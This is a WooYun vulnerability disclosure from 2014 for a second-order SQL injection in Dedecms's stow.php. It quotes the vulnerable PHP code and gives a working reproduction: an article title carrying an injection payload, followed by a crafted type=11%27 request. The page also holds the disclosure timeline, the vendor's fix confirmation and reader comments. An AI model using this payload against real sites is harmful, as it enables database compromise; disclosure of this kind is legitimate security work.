当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048913

漏洞标题:Dedecms 会员中心注入漏洞8(二次注入)

相关厂商:Dedecms

漏洞作者: Matt

提交时间:2014-01-14 18:25

修复时间:2014-04-14 18:26

公开时间:2014-04-14 18:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-14: 细节已通知厂商并且等待厂商处理中
2014-01-14: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向第三方安全合作伙伴开放
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-03-30: 细节向实习白帽子公开
2014-04-14: 细节向公众公开

简要描述:

Dedecms 会员中心注入漏洞8(二次注入)
吃了个饭 继续挖
哈哈 其实不是会员中心的 但是和会员中心有关,标题为了统一就这么写了

详细说明:

/plus/stow.php
if($type=='')
{
$row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE aid='$aid'
AND mid='{$ml->M_ID}'");
if(!is_array($row))
{
$dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`
(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes
($arctitle)."','$addtime'); ");
} else {
ShowMsg('您已经成功收藏该内容,无需重复收
藏!','javascript:window.close();');
exit();
}
} else {
$row = $dsql->GetOne("SELECT * FROM `#@__member_stow` WHERE
type='$type' AND (aid='$aid' AND mid='{$ml->M_ID}')");
if(!is_array($row))
{
$dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`
(mid,aid,title,addtime,type) VALUES ('".$ml-
>M_ID."','$aid','$title','$addtime','$type'); ");//这里的TITLE是从数据库里
查询出来的,也就是我们发布的文章的标题
}

漏洞证明:

那么soeasy 我们发布一个文章
http://127.0.0.1/dede/member/content_list.php?channelid=1 打开这里发布
文章标题写上 1111',1,2),(8,136,user(),1,2),(1,2,'3
其他随意
然后提交
完了之后查看一下文章的ID
在打开http://127.0.0.1/dede/plus/stow.php?aid=137&type=11%27
把137改成你的文章ID就哦了

QQ截图20140114181557.png

3.png

2.png


5.png

修复方案:

你猜啊

版权声明:转载请注明来源 Matt@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-01-14 22:24

厂商回复:

已修复,感谢反馈

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-14 18:26 | 微信公众号 ( 路人 | Rank:0 漏洞数:1 | 关注信息安全,关注最新最前沿网络技术)

    洞主,你为何这么吊

  2. 2014-01-14 18:34 | Stranger ( 路人 | Rank:0 漏洞数:1 | 我注意你很久了.....)

    拽人,拽事,拽人生啊....这节奏....

  3. 2014-01-15 04:21 | 马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)

    ....我只是想吐槽一下 厂商复活了??